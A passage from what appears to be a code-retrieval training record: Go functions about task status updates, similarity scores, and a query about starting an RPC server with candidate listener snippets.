||\n\t\t!taskInfo.GetConfig().GetHealthCheck().GetEnabled() {\n\t\tlog.WithFields(log.Fields{\n\t\t\t\"db_task_runtime\": taskInfo.GetRuntime(),\n\t\t\t\"task_status_event\": mesosTaskStatus,\n\t\t\t\"pod_event\": podEvent,\n\t\t}).Debug(\"skip same status update if health check is not configured or \" +\n\t\t\t\"disabled\")\n\t\treturn true\n\t}\n\n\tnewStateReason := updateEvent.Reason()\n\t// TODO p2k: not sure which kubelet reason matches this.\n\t// Should we skip some status updates from kubelets?\n\tif newStateReason != mesos.TaskStatus_REASON_TASK_HEALTH_CHECK_STATUS_UPDATED.String() {\n\t\tlog.WithFields(log.Fields{\n\t\t\t\"db_task_runtime\": taskInfo.GetRuntime(),\n\t\t\t\"task_status_event\": mesosTaskStatus,\n\t\t\t\"pod_event\": podEvent,\n\t\t}).Debug(\"skip same status update if status update reason is not from health check\")\n\t\treturn true\n\t}\n\n\t// Current behavior will log consecutive negative health check results\n\t// ToDo (varung): Evaluate if consecutive negative results should be logged or not\n\tisPreviousStateHealthy := taskInfo.GetRuntime().GetHealthy() == pb_task.HealthState_HEALTHY\n\tif !isPreviousStateHealthy {\n\t\tlog.WithFields(log.Fields{\n\t\t\t\"db_task_runtime\": taskInfo.GetRuntime(),\n\t\t\t\"task_status_event\": mesosTaskStatus,\n\t\t\t\"pod_event\": podEvent,\n\t\t}).Debug(\"log each negative health check result\")\n\t\treturn false\n\t}\n\n\tif updateEvent.Healthy() == isPreviousStateHealthy {\n\t\tlog.WithFields(log.Fields{\n\t\t\t\"db_task_runtime\": taskInfo.GetRuntime(),\n\t\t\t\"task_status_event\": mesosTaskStatus,\n\t\t\t\"pod_event\": podEvent,\n\t\t}).Debug(\"skip same status update if health check result is positive consecutively\")\n\t\treturn true\n\t}\n\n\treturn false\n}", "func (c *Controller) updateTaskResults(t *Task) bool {\n\tif t.update == nil {\n\t\treturn false\n\t}\n\n\texpr := t.update\n\tfor i := len(t.labels) - 1; i >= 0; i-- {\n\t\texpr = &adt.StructLit{\n\t\t\tDecls: []adt.Decl{\n\t\t\t\t&adt.Field{\n\t\t\t\t\tLabel: t.labels[i],\n\t\t\t\t\tValue: expr,\n\t\t\t\t},\n\t\t\t},\n\t\t}\n\t}\n\n\tt.update = nil\n\n\t// TODO: replace rather than add conjunct if this task already added a\n\t// conjunct before. This will allow for serving applications.\n\tc.conjuncts = append(c.conjuncts, adt.MakeRootConjunct(c.env, expr))\n\tc.conjunctSeq++\n\tt.conjunctSeq = c.conjunctSeq\n\n\treturn true\n}", "func (t TaskService) UpdateTask(ctx context.Context, id platform.ID, upd taskmodel.TaskUpdate) (*taskmodel.Task, error) {\n\tspan, _ := tracing.StartSpanFromContext(ctx)\n\tdefer span.Finish()\n\n\tvar tr taskResponse\n\terr := t.Client.\n\t\tPatchJSON(&upd, taskIDPath(id)).\n\t\tDo(ctx)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\treturn convertTask(tr.Task), nil\n}", "func TaskStatusString(s string) (TaskStatus, error) {\n\tif val, ok := _TaskStatusNameToValueMap[s]; ok {\n\t\treturn val, nil\n\t}\n\treturn 0, fmt.Errorf(\"%s does not belong to TaskStatus values\", s)\n}", "func ChangeTaskState(taskID string, stateCode int, state string, desc string) error {\n\ttasks.Lock()\n\tdefer tasks.Unlock()\n\n\tif _, ok := tasks.m[taskID]; ok { // key exist\n\t\tpState := tasks.m[taskID]\n\t\tpState.StateCode = stateCode\n\t\tpState.State = state\n\t\tpState.Description = desc\n\t\treturn nil\n\t}\n\n\treturn errors.New(\"Task not exist\")\n}", "func updateTasks(c context.Context) {\n\tnow := clock.Now(c)\n\tq := datastore.NewQuery(\"TaskCount\").Order(\"computed\")\n\tif err := datastore.Run(c, q, func(tc *TaskCount) {\n\t\tif now.Sub(tc.Computed) > 5*time.Minute {\n\t\t\tlogging.Debugf(c, \"deleting outdated count %q\", tc.Queue)\n\t\t\tif err := datastore.Delete(c, tc); err != nil {\n\t\t\t\tlogging.Errorf(c, \"%s\", err)\n\t\t\t}\n\t\t\treturn\n\t\t}\n\t\ttasksExecuting.Set(c, int64(tc.Executing), tc.Queue)\n\t\ttasksPending.Set(c, int64(tc.Total-tc.Executing), tc.Queue)\n\t\ttasksTotal.Set(c, int64(tc.Total), tc.Queue)\n\t}); err != nil {\n\t\terrors.Log(c, errors.Annotate(err, \"failed to fetch counts\").Err())\n\t}\n}", "func (c *Client) GetTaskStatus(url string, paras *TaskPathParas,\n\trequest *StartTaskRequest) (*TaskStatusResponse, error) {\n\tif c == nil {\n\t\treturn nil, ErrServerNotInit\n\t}\n\n\tuserAuth, err := c.generateGateWayAuth(paras.Operator)\n\tif err != nil {\n\t\treturn nil, fmt.Errorf(\"bksops StartBkOpsTask generateGateWayAuth failed: %v\", err)\n\t}\n\n\tvar (\n\t\treqURL = fmt.Sprintf(\"/get_task_status/%s/%s/\", paras.TaskID, paras.BkBizID)\n\t\trespData = &TaskStatusResponse{}\n\t)\n\n\trequest.Scope = string(CmdbBizScope)\n\t_, _, errs := gorequest.New().\n\t\tTimeout(defaultTimeOut).\n\t\tGet(c.server+reqURL).\n\t\tSet(\"Content-Type\", \"application/json\").\n\t\tSet(\"Accept\", \"application/json\").\n\t\tSet(\"X-Bkapi-Authorization\", userAuth).\n\t\tSetDebug(c.serverDebug).\n\t\tSend(request).\n\t\tEndStruct(&respData)\n\tif len(errs) > 0 {\n\t\tblog.Errorf(\"call api GetTaskStatus failed: %v\", errs[0])\n\t\treturn nil, errs[0]\n\t}\n\n\tif !respData.Result {\n\t\tblog.Errorf(\"call api GetTaskStatus failed: %v\", respData.Message)\n\t\treturn nil, fmt.Errorf(respData.Message)\n\t}\n\n\t//successfully request\n\tblog.Infof(\"call api GetTaskStatus with url(%s) successfully\", reqURL)\n\treturn respData, nil\n}", "func HandleQueryTaskStatus(w http.ResponseWriter, r *http.Request) {\n\tlog.Root.Info(\"HandleQueryTaskStatus BEGIN\")\n\n\tif r.Method != http.MethodGet {\n\t\tw.WriteHeader(http.StatusNotFound)\n\t\tHttpResponseError(w, ErrNotFound)\n\t\treturn\n\t}\n\n\ttaskIDList := r.URL.Query()[\"taskID\"]\n\tif len(taskIDList) == 0 {\n\t\tlog.Root.Error(\"HandleQueryTaskStatus Parse HTTP request param error\")\n\t\tHttpResponseError(w, ErrParams)\n\t\treturn\n\t}\n\n\ttaskStatusMap, err := node.QueryTaskStatus(taskIDList)\n\tif err != nil {\n\t\tlog.Root.Error(\"HandleQueryTaskStatus Query task status error. TaskIDList: %v\", taskIDList)\n\t\tHttpResponseError(w, ErrServer)\n\t\treturn\n\t}\n\n\ttaskStatusList := []interface{}{}\n\tfor k, v := range taskStatusMap {\n\t\tjsonMap := map[string]interface{}{\n\t\t\t\"taskID\": k,\n\t\t\t\"taskStatus\": v,\n\t\t}\n\t\ttaskStatusList = append(taskStatusList, jsonMap)\n\t}\n\n\tlog.Root.Info(\"HandleQueryTaskStatus END\")\n\tHttpResponseData(w, H{\n\t\t\"taskStatusList\": taskStatusList,\n\t})\n\treturn\n}", "func (md *ManagementNode) SetTaskState(ctx context.Context, task *pb.Task) (*pb.Empty, error) {\n\n\t// TBD: check of existed object might be needed\n\t// might be dead before state change\n\n\tlog.Infof(\"SetTaskState with params %+v\", task)\n\n\tif err := md.StopTaskDeadTimeout(ctx, task.Id); err != nil {\n\t\tcommon.PrintDebugErr(err)\n\t\treturn nil, err\n\t}\n\n\tif err := md.SetToDb(ctx, task, EtcdTaskPrefix+task.Id); err != nil {\n\t\tcommon.PrintDebugErr(err)\n\t\treturn nil, err\n\t}\n\n\treturn &pb.Empty{}, nil\n}", "func (s *BatchLoadTask) SetTaskStatus(v string) *BatchLoadTask {\n\ts.TaskStatus = &v\n\treturn s\n}", "func (manager *Manager) updateStatus(jobStatus ingestic.JobStatus) {\n\tmanager.estimatedEndTimeInSec = jobStatus.EstimatedEndTimeInSec\n\tmanager.percentageComplete = jobStatus.PercentageComplete\n\n\tevent := &automate_event.EventMsg{\n\t\tEventID: createEventUUID(),\n\t\tType: &automate_event.EventType{Name: automate_event_type.ProjectRulesUpdateStatus},\n\t\tPublished: ptypes.TimestampNow(),\n\t\tProducer: &automate_event.Producer{\n\t\t\tID: event_ids.ComplianceInspecReportProducerID,\n\t\t},\n\t\tData: &_struct.Struct{\n\t\t\tFields: map[string]*_struct.Value{\n\t\t\t\t\"Completed\": {\n\t\t\t\t\tKind: &_struct.Value_BoolValue{\n\t\t\t\t\t\tBoolValue: jobStatus.Completed,\n\t\t\t\t\t},\n\t\t\t\t},\n\t\t\t\t\"PercentageComplete\": {\n\t\t\t\t\tKind: &_struct.Value_NumberValue{\n\t\t\t\t\t\tNumberValue: float64(jobStatus.PercentageComplete),\n\t\t\t\t\t},\n\t\t\t\t},\n\t\t\t\t\"EstimatedTimeCompeleteInSec\": {\n\t\t\t\t\tKind: &_struct.Value_NumberValue{\n\t\t\t\t\t\tNumberValue: float64(jobStatus.EstimatedEndTimeInSec),\n\t\t\t\t\t},\n\t\t\t\t},\n\t\t\t\tproject_update_tags.ProjectUpdateIDTag: {\n\t\t\t\t\tKind: &_struct.Value_StringValue{\n\t\t\t\t\t\tStringValue: manager.projectUpdateID,\n\t\t\t\t\t},\n\t\t\t\t},\n\t\t\t},\n\t\t},\n\t}\n\n\tpubReq := &automate_event.PublishRequest{Msg: event}\n\t_, err := manager.eventServiceClient.Publish(context.Background(), pubReq)\n\tif err != nil {\n\t\tlogrus.Warnf(\"Publishing Failed event %v\", err)\n\t}\n}", "func (p SourceProvider) TaskDone(t *provider.Task) error {\n\tt.LastRunAt = time.Now()\n\tt.Running = false\n\tt.LastError = \"\"\n\tt.CurrentRetryCount = 0\n\tif !p.Config.Enabled {\n\t\treturn nil\n\t}\n\tif p.Connection.KAPI == nil {\n\t\tif err := p.Connection.Connect(); err != nil {\n\t\t\treturn err\n\t\t}\n\t}\n\n\tif err := p.Connection.WriteTask(t); err != nil {\n\t\treturn err\n\t}\n\treturn nil\n}", "func TaskBulkUpdateState(db *pg.DB, tasksPtr *[]Task, state string) error {\n\ttasks := *tasksPtr\n\tif len(tasks) == 0 {\n\t\treturn nil\n\t}\n\tuTasks := []Task{}\n\tfor i := 0; i < len(tasks); i++ {\n\t\tuTasks = append(uTasks, Task{\n\t\t\tID: tasks[i].ID,\n\t\t\tState: state,\n\t\t})\n\t}\n\t_, err := db.Model(&uTasks).Column(\"state\").Update()\n\tif err != nil {\n\t\treturn err\n\t}\n\treturn nil\n}", "func (r *TaskRepository) UpdateTask(t *api.Task) (*api.Task, error){\n\t// according to doc UpdatedAt will be set automatically\n\tr.DB.Update(t)\n\n\treturn t, nil\n}", "func resetTask(ctx context.Context, settings *evergreen.Settings, taskId, username string, failedOnly bool) error {\n\tt, err := task.FindOneId(taskId)\n\tif err != nil {\n\t\treturn gimlet.ErrorResponse{\n\t\t\tStatusCode: http.StatusInternalServerError,\n\t\t\tMessage: errors.Wrapf(err, \"finding task '%s'\", t).Error(),\n\t\t}\n\t}\n\tif t == nil {\n\t\treturn gimlet.ErrorResponse{\n\t\t\tStatusCode: http.StatusNotFound,\n\t\t\tMessage: fmt.Sprintf(\"task '%s' not found\", taskId),\n\t\t}\n\t}\n\treturn errors.Wrapf(serviceModel.ResetTaskOrDisplayTask(ctx, settings, t, username, evergreen.RESTV2Package, failedOnly, nil), \"resetting task '%s'\", taskId)\n}", "func (h *Handler) UpdateStatus(w http.ResponseWriter, r *http.Request) {\n\n\tcmd := sigstat.Command{\n\t\tStatus: \"running\",\n\t}\n\n\th.client.CommandService().UpdateStatus(cmd)\n}", "func UpdateTask(task Task) error {\n\terr := DB.Save(&task).Error\n\treturn err\n}", "func (d *Release) Status() *Task {\n\t_ = d.merge()\n\treturn d.task\n}", "func (mr *MockICompilationTaskMockRecorder) UpdateTaskStatus(taskID, status interface{}) *gomock.Call {\n\tmr.mock.ctrl.T.Helper()\n\treturn mr.mock.ctrl.RecordCallWithMethodType(mr.mock, \"UpdateTaskStatus\", reflect.TypeOf((*MockICompilationTask)(nil).UpdateTaskStatus), taskID, status)\n}", "func (context Context) UpdateTaskStage(id string, stage string) (err error) {\n\t_, err = context.UpdateTask(id, F{\"stage\": stage})\n\treturn\n}", "func taskDefUpdateHandler(w http.ResponseWriter, r *http.Request, isReplace bool) {\r\n\r\n\t// decode json run \"public\" metadata\r\n\tvar tpd db.TaskDefPub\r\n\tif !jsonRequestDecode(w, r, true, &tpd) {\r\n\t\treturn // error at json decode, response done with http error\r\n\t}\r\n\r\n\t// if task name is empty then automatically generate name\r\n\tif tpd.Name == \"\" {\r\n\t\tts, _ := theCatalog.getNewTimeStamp()\r\n\t\ttpd.Name = \"task_\" + ts\r\n\t}\r\n\r\n\t// update task definition in model catalog\r\n\tok, dn, tn, err := theCatalog.UpdateTaskDef(isReplace, &tpd)\r\n\tif err != nil {\r\n\t\tomppLog.Log(err.Error())\r\n\t\thttp.Error(w, \"Modeling task merge failed \"+dn+\": \"+tn, http.StatusBadRequest)\r\n\t\treturn\r\n\t}\r\n\tif ok {\r\n\t\tw.Header().Set(\"Content-Location\", \"/api/model/\"+dn+\"/task/\"+tn)\r\n\t\tjsonResponse(w, r,\r\n\t\t\tstruct {\r\n\t\t\t\tName string // task name\r\n\t\t\t}{\r\n\t\t\t\tName: tn,\r\n\t\t\t},\r\n\t\t)\r\n\t}\r\n}", "func (ctl *StatusController) fillTask(ctx context.Context, task Task) (TaskStatus, error) {\n\tvar err error\n\ts := TaskStatus{\n\t\tInfo: task.Info,\n\t}\n\n\tif s.paused, err = task.IsPaused(ctx); err != nil {\n\t\treturn s, errors.Annotatef(err, \"failed to get pause status of task %s\", s.Info.Name)\n\t}\n\n\tif s.Checkpoints, err = task.NextBackupTSList(ctx); err != nil {\n\t\treturn s, errors.Annotatef(err, \"failed to get progress of task %s\", s.Info.Name)\n\t}\n\n\tif s.globalCheckpoint, err = task.GetStorageCheckpoint(ctx); err != nil {\n\t\treturn s, errors.Annotatef(err, \"failed to get storage checkpoint of task %s\", s.Info.Name)\n\t}\n\n\ts.LastErrors, err = task.LastError(ctx)\n\tif err != nil {\n\t\treturn s, err\n\t}\n\n\ts.QPS, err = MaybeQPS(ctx, ctl.mgr)\n\tif err != nil {\n\t\treturn s, errors.Annotatef(err, \"failed to get QPS of task %s\", s.Info.Name)\n\t}\n\treturn s, nil\n}", "func updateStatus(args []string) {\n\tdata, klocworkURL := formBaseRequest(\"update_status\")\n\tdata.Set(\"project\", args[0])\n\tdata.Set(\"ids\", args[1])\n\tdata.Set(\"status\", args[2])\n\n\tsendRequest(klocworkURL, data)\n\n}", "func (c *scheduledJobs) UpdateStatus(job *batch.ScheduledJob) (result *batch.ScheduledJob, err error) {\n\tresult = &batch.ScheduledJob{}\n\terr = c.r.Put().Namespace(c.ns).Resource(\"scheduledjobs\").Name(job.Name).SubResource(\"status\").Body(job).Do().Into(result)\n\treturn\n}", "func (task *Task) Run(ctx context.Context) error {\n\tctx = task.context(ctx)\n\tdefer task.UpdateStatus(StatusTaskCompleted)\n\tlog.WithContext(ctx).Debug(\"Start task\")\n\tdefer log.WithContext(ctx).Debug(\"End task\")\n\tdefer task.Cancel()\n\n\ttask.SetStatusNotifyFunc(func(status *state.Status) {\n\t\tlog.WithContext(ctx).WithField(\"status\", status.String()).Debugf(\"States updated\")\n\t})\n\n\treturn task.RunAction(ctx)\n}", "func (t TaskInstanceRepoCassandra) UpdateStatuses(ctx context.Context, taskInstance TaskInstance) (err error) {\n\terr = t.updateStatusesInInstances(ctx, taskInstance)\n\tif err != nil {\n\t\treturn\n\t}\n\terr = t.updateStatusesInInstanceStartedAt(ctx, taskInstance)\n\tif err != nil {\n\t\treturn\n\t}\n\treturn t.updateStatusesInInstancesByID(ctx, taskInstance)\n}", "func (s *ListBatchLoadTasksInput) SetTaskStatus(v string) *ListBatchLoadTasksInput {\n\ts.TaskStatus = &v\n\treturn s\n}", "func UpdateAsyncStatus(db *sqlx.DB, newStatus string, newMessage string, asyncStatusId int, finished bool) error {\n\tif asyncStatusId == 0 {\n\t\treturn nil\n\t}\n\ttx, err := db.Begin()\n\tif err != nil {\n\t\treturn err\n\t}\n\tdefer tx.Commit()\n\n\tq := updateAsyncStatusQuery\n\tif finished {\n\t\tq = updateAsyncStatusEndTimeQuery\n\t}\n\t_, err = tx.Exec(q, newStatus, newMessage, asyncStatusId)\n\tif err != nil {\n\t\treturn err\n\t}\n\n\treturn nil\n}", "func testUpdateTasksWithRetriesSuccess(t sktest.TestingT, db TaskDB) {\n\tctx := context.Background()\n\tbegin := time.Now()\n\n\t// Create and cache.\n\tt1 := types.MakeTestTask(begin.Add(TS_RESOLUTION), []string{\"a\", \"b\", \"c\", \"d\"})\n\trequire.NoError(t, db.PutTask(ctx, t1))\n\tt1Cached := t1.Copy()\n\n\t// Update original.\n\tt1.Status = types.TASK_STATUS_RUNNING\n\trequire.NoError(t, db.PutTask(ctx, t1))\n\n\t// Attempt update.\n\tcallCount := 0\n\ttasks, err := UpdateTasksWithRetries(ctx, db, func() ([]*types.Task, error) {\n\t\tcallCount++\n\t\tif callCount >= 3 {\n\t\t\tif task, err := db.GetTaskById(ctx, t1.Id); err != nil {\n\t\t\t\treturn nil, err\n\t\t\t} else {\n\t\t\t\tt1Cached = task\n\t\t\t}\n\t\t}\n\t\tt1Cached.Status = types.TASK_STATUS_SUCCESS\n\t\tt2 := types.MakeTestTask(begin.Add(2*TS_RESOLUTION), []string{\"e\", \"f\"})\n\t\treturn []*types.Task{t1Cached, t2}, nil\n\t})\n\trequire.NoError(t, err)\n\trequire.Equal(t, 3, callCount)\n\trequire.Equal(t, 2, len(tasks))\n\trequire.Equal(t, t1.Id, tasks[0].Id)\n\trequire.Equal(t, types.TASK_STATUS_SUCCESS, tasks[0].Status)\n\trequire.Equal(t, []string{\"e\", \"f\"}, tasks[1].Commits)\n\n\t// Check that return value matches what's in the DB.\n\tt1, err = db.GetTaskById(ctx, t1.Id)\n\trequire.NoError(t, err)\n\tt2, err := db.GetTaskById(ctx, tasks[1].Id)\n\trequire.NoError(t, err)\n\tAssertDeepEqual(t, tasks[0], t1)\n\tAssertDeepEqual(t, tasks[1], t2)\n\n\t// Check no extra tasks in the DB.\n\ttasks, err = db.GetTasksFromDateRange(ctx, begin, time.Now().Add(3*TS_RESOLUTION), \"\")\n\trequire.NoError(t, err)\n\trequire.Equal(t, 2, len(tasks))\n\trequire.Equal(t, t1.Id, tasks[0].Id)\n\trequire.Equal(t, t2.Id, tasks[1].Id)\n}", "func (s *StubTodoStore) UpdateTask(task model.Task) error {\n\t// since we dont know the old task name we search for any duplicates and delete them\n\t// in the case that the task was not renamed but completed/reopened\n\tfor i, storeTask := range s.Tasks {\n\t\tif storeTask.Name == task.Name {\n\t\t\ts.Tasks = append(s.Tasks[:i], s.Tasks[(i+1):]...)\n\t\t}\n\t}\n\n\tstubTask := stubTask{Name: task.Name, Done: task.Done}\n\ts.Tasks = append(s.Tasks, stubTask)\n\n\treturn nil\n}", "func (w *Worker) UpdateSubTask(cfg *config.SubTaskConfig) (int64, error) {\n\tw.Lock()\n\tdefer w.Unlock()\n\n\tcfgStr, err := cfg.Toml()\n\tif err != nil {\n\t\treturn 0, terror.Annotatef(err, \"encode subtask %+v into toml format\", cfg)\n\t}\n\n\topLogID, err := w.operateSubTask(&pb.TaskMeta{\n\t\tOp: pb.TaskOp_Update,\n\t\tName: cfg.Name,\n\t\tTask: append([]byte{}, cfgStr...),\n\t})\n\tif err != nil {\n\t\treturn 0, err\n\t}\n\n\treturn opLogID, nil\n}", "func (s *K8sSvc) GetTaskStatus(ctx context.Context, cluster string, taskID string) (*common.TaskStatus, error) {\n\trequuid := utils.GetReqIDFromContext(ctx)\n\n\tjob, err := s.cliset.BatchV1().Jobs(s.namespace).Get(taskID, metav1.GetOptions{})\n\tif err != nil {\n\t\tglog.Errorln(\"get task error\", err, \"taskID\", taskID, \"requuid\", requuid)\n\t\treturn nil, err\n\t}\n\n\tglog.Infoln(\"get task\", taskID, job.Status, \"requuid\", requuid)\n\n\tstatus := &common.TaskStatus{\n\t\tStatus: common.TaskStatusRunning,\n\t}\n\tif job.Status.StartTime != nil {\n\t\tstatus.StartedAt = job.Status.StartTime.String()\n\t}\n\tif job.Status.CompletionTime != nil {\n\t\tstatus.FinishedAt = job.Status.CompletionTime.String()\n\t}\n\n\tif job.Status.Succeeded > 0 {\n\t\tglog.Infoln(\"task succeeded, taskID\", taskID, \"requuid\", requuid)\n\t\tstatus.Status = common.TaskStatusStopped\n\t\tstatus.StoppedReason = \"success\"\n\t\treturn status, nil\n\t}\n\n\tif len(job.Status.Conditions) != 0 {\n\t\tglog.Infoln(\"task status conditions\", job.Status.Conditions[0], \"taskID\", taskID, \"requuid\", requuid)\n\n\t\tif job.Status.Conditions[0].Type == batchv1.JobComplete ||\n\t\t\tjob.Status.Conditions[0].Type == batchv1.JobFailed {\n\t\t\tstatus.Status = common.TaskStatusStopped\n\t\t\tstatus.StoppedReason = job.Status.Conditions[0].Message\n\t\t\treturn status, nil\n\t\t}\n\t}\n\n\treason := fmt.Sprintf(\"unknown task status, actively running pods %d, failed pods %d\", job.Status.Active, job.Status.Failed)\n\tglog.Infoln(reason, \"taskID\", taskID, \"requuid\", requuid, job.Status)\n\treturn status, nil\n}", "func (p SourceProvider) OnTaskUpdate(fn func(*provider.Task) error) {\n\tgo func() {\n\t\tfor {\n\t\t\tselect {\n\t\t\tcase task := <-p.TaskFlow:\n\t\t\t\tfn(&task)\n\t\t\tcase <-p.QuitChan:\n\t\t\t\treturn\n\t\t\t}\n\t\t}\n\t}()\n}", "func (s *BatchLoadTaskDescription) SetTaskStatus(v string) *BatchLoadTaskDescription {\n\ts.TaskStatus = &v\n\treturn s\n}", "func TasksUpdate(c buffalo.Context) error {\n\ttask := &models.Task{}\n\n\ttx := c.Value(\"tx\").(*pop.Connection)\n\terr := tx.Eager().Find(task, c.Param(\"task_id\"))\n\tif err != nil {\n\t\tlog.Println(err)\n\t\tc.Flash().Add(\"warning\", \"Cannot find that task.\")\n\t\treturn c.Redirect(307, \"/\")\n\t}\n\n\t// Bind entity to the HTML form.\n\tif err := c.Bind(task); err != nil {\n\t\treturn err\n\t}\n\n\ttask.UpdatedAt = time.Now()\n\n\t// Validate the data from the html form.\n\tverrs, err := tx.ValidateAndUpdate(task)\n\tif err != nil {\n\t\treturn errors.WithStack(err)\n\t}\n\n\tif verrs.HasAny() {\n\t\tc.Set(\"task\", task)\n\t\t// Make the errors available inside the html template\n\t\tc.Set(\"errors\", verrs)\n\t\treturn c.Render(422, r.HTML(\"tasks/edit.html\"))\n\t}\n\n\tc.Flash().Add(\"success\", \"Task updated.\")\n\treturn c.Redirect(303, \"/users/%s/contracts/%d\", task.Contract.UserID, task.Contract.ID)\n}", "func (db DB) DoneTask(date time.Time) error {\n\tctx, cancel := context.WithTimeout(context.Background(), 10*time.Second)\n\tdefer cancel()\n\tclient, err := db.Connect()\n\tif err != nil {\n\t\treturn err\n\t}\n\tif _, err := client.Database(\"tasker\").Collection(\"tasks\").UpdateMany(ctx, bson.M{\"date\": date}, bson.M{\"$set\": bson.M{\"done\": true}}); err != nil {\n\t\treturn err\n\t}\n\treturn nil\n}", "func updateTask(msg BackendPayload) {\n\tincomingTaskID := msg.ID // attempt to retreive the id of the task in the case its an update POST\n\t// TodoList[incomingTaskID] = Task{incomingTaskID, msg.TaskName} // update task with id provided\n\tTodoList.Store(incomingTaskID, Task{incomingTaskID, msg.TaskName})\n\treturn\n}", "func testUpdateTaskWithRetriesErrorInFunc(t sktest.TestingT, db TaskDB) {\n\tctx := context.Background()\n\tbegin := time.Now()\n\n\t// Create new task t1.\n\tt1 := types.MakeTestTask(begin.Add(TS_RESOLUTION), []string{\"a\", \"b\", \"c\", \"d\"})\n\trequire.NoError(t, db.PutTask(ctx, t1))\n\n\t// Update and return an error.\n\tmyErr := fmt.Errorf(\"Um, actually, I didn't want to update that task.\")\n\tcallCount := 0\n\tnoTask, err := UpdateTaskWithRetries(ctx, db, t1.Id, func(task *types.Task) error {\n\t\tcallCount++\n\t\t// Update task to test nothing changes in DB.\n\t\ttask.Status = types.TASK_STATUS_RUNNING\n\t\treturn myErr\n\t})\n\trequire.Error(t, err)\n\trequire.Equal(t, myErr, err)\n\trequire.Nil(t, noTask)\n\trequire.Equal(t, 1, callCount)\n\n\t// Check task did not change in the DB.\n\tt1Again, err := db.GetTaskById(ctx, t1.Id)\n\trequire.NoError(t, err)\n\tAssertDeepEqual(t, t1, t1Again)\n\n\t// Check no extra tasks in the DB.\n\ttasks, err := db.GetTasksFromDateRange(ctx, begin, time.Now().Add(2*TS_RESOLUTION), \"\")\n\trequire.NoError(t, err)\n\trequire.Equal(t, 1, len(tasks))\n\trequire.Equal(t, t1.Id, tasks[0].Id)\n}", "func (mr *MockDBMockRecorder) UpdateTaskStatus(taskID, status interface{}) *gomock.Call {\n\tmr.mock.ctrl.T.Helper()\n\treturn mr.mock.ctrl.RecordCallWithMethodType(mr.mock, \"UpdateTaskStatus\", reflect.TypeOf((*MockDB)(nil).UpdateTaskStatus), taskID, status)\n}" ]
[ "0.80603653", "0.7995561", "0.79425794", "0.7895905", "0.7725359", "0.75573677", "0.7514321", "0.73935276", "0.7366755", "0.7346412", "0.7342435", "0.72824836", "0.7030268", "0.6976509", "0.685103", "0.6832641", "0.6811408", "0.67838687", "0.673875", "0.66078985", "0.6592641", "0.65868175", "0.65121317", "0.64107156", "0.6410606", "0.63988364", "0.6396693", "0.63710463", "0.63141495", "0.6313031", "0.6286898", "0.62729865", "0.6267791", "0.6266998", "0.6261738", "0.62368095", "0.6221641", "0.6206585", "0.61999387", "0.6190926", "0.6153932", "0.61420965", "0.6130201", "0.6107101", "0.6102979", "0.60710675", "0.6047896", "0.60409254", "0.60354793", "0.60334283", "0.59646463", "0.59486675", "0.59189165", "0.59066254", "0.5889367", "0.5872684", "0.58348006", "0.5830678", "0.58299434", "0.5810654", "0.58034945", "0.5798718", "0.57917815", "0.57821953", "0.5773643", "0.57477385", "0.57444644", "0.57435244", "0.5736902", "0.5723452", "0.57087195", "0.5704776", "0.56979644", "0.5697697", "0.56944406", "0.56904036", "0.56837857", "0.5683767", "0.56764716", "0.56688505", "0.5652152", "0.56352437", "0.56337863", "0.56193566", "0.561311", "0.5606844", "0.5600939", "0.55949205", "0.55909175", "0.55856574", "0.5583856", "0.5582072", "0.5579721", "0.557826", "0.55764586", "0.5564005", "0.55589277", "0.55515665", "0.55491185", "0.5549043" ]
0.7315912
11
start a thread that listens for RPCs from worker.go
func (m *Master) server() { rpc.Register(m) rpc.HandleHTTP() //l, e := net.Listen("tcp", ":1234") sockname := masterSock() os.Remove(sockname) l, e := net.Listen("unix", sockname) if e != nil { log.Fatal("listen error:", e) } go http.Serve(l, nil) }
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "func (wk *Worker) startRPCServer() {\n\t// TODO: implement me\n\t// Hint: Refer to how the driver's startRPCServer is implemented.\n\t// TODO TODO TODO\n\t//\n\n\t//\n\t// Once shutdown is closed, should the following statement be\n\t// called, meaning the worker RPC server is existing.\n\tserverless.Debug(\"Worker: %v RPC server exist\\n\", wk.address)\n}", "func listenRPC(app *core.App, config standaloneConfig) error {\n\t// Initialize the JSON RPC WebSocket server (but don't start it yet).\n\trpcAddr := fmt.Sprintf(\":%d\", config.RPCPort)\n\trpcHandler := &rpcHandler{\n\t\tapp: app,\n\t}\n\trpcServer, err := rpc.NewServer(rpcAddr, rpcHandler)\n\tif err != nil {\n\t\treturn nil\n\t}\n\tgo func() {\n\t\t// Wait for the server to start listening and select an address.\n\t\tfor rpcServer.Addr() == nil {\n\t\t\ttime.Sleep(10 * time.Millisecond)\n\t\t}\n\t\tlog.WithField(\"address\", rpcServer.Addr().String()).Info(\"started RPC server\")\n\t}()\n\treturn rpcServer.Listen()\n}", "func startServer(wg *sync.WaitGroup) {\n\tdefer wg.Done()\n\n\tlistener, err := net.Listen(\"tcp\", fmt.Sprintf(\"%s:%d\", MyHandle.Host, MyHandle.Port))\n\tif err != nil {\n\t\tlog.Fatalf(\"failed to startServer: %v\", err)\n\t}\n\n\tgrpcServer := grpc.NewServer()\n\tapi.RegisterGoChatServer(grpcServer, &chatServer{})\n\n\terr = grpcServer.Serve(listener)\n\tif err != nil {\n\t\tlog.Fatalf(\"failed to serve: %v\", err)\n\t}\n}", "func (s *Server) RunRPC(ctx context.Context, wg *sync.WaitGroup) error {\n\twg.Add(1)\n\n\tl, err := net.Listen(\"tcp\", s.GRPCListen)\n\tif err != nil {\n\t\treturn err\n\t}\n\n\tsrvr := grpc.NewServer()\n\tpb.RegisterRegistryServer(srvr, s)\n\n\t// Shutdown procedure.\n\tgo func() {\n\t\t<-ctx.Done()\n\t\tlog.Println(\"Shutting down gRPC listener\")\n\n\t\tsrvr.GracefulStop()\n\n\t\tif err := l.Close(); err != nil {\n\t\t\tlog.Println(err)\n\t\t}\n\n\t\twg.Done()\n\t}()\n\n\t// Background the listener.\n\tgo func() {\n\t\tlog.Printf(\"gRPC up: %s\\n\", s.GRPCListen)\n\t\tif err := srvr.Serve(l); err != nil {\n\t\t\tlog.Println(err)\n\t\t}\n\t}()\n\n\treturn nil\n}", "func (r *runtime) startGRPCServer() {\n\tr.logger.Info(\"starting GRPC server\")\n\tr.grpcServer = newGRPCServer(r.config.BrokerBase.GRPC, linmetric.BrokerRegistry)\n\n\t// bind grpc handlers\n\tr.rpcHandler = &rpcHandler{\n\t\thandler: 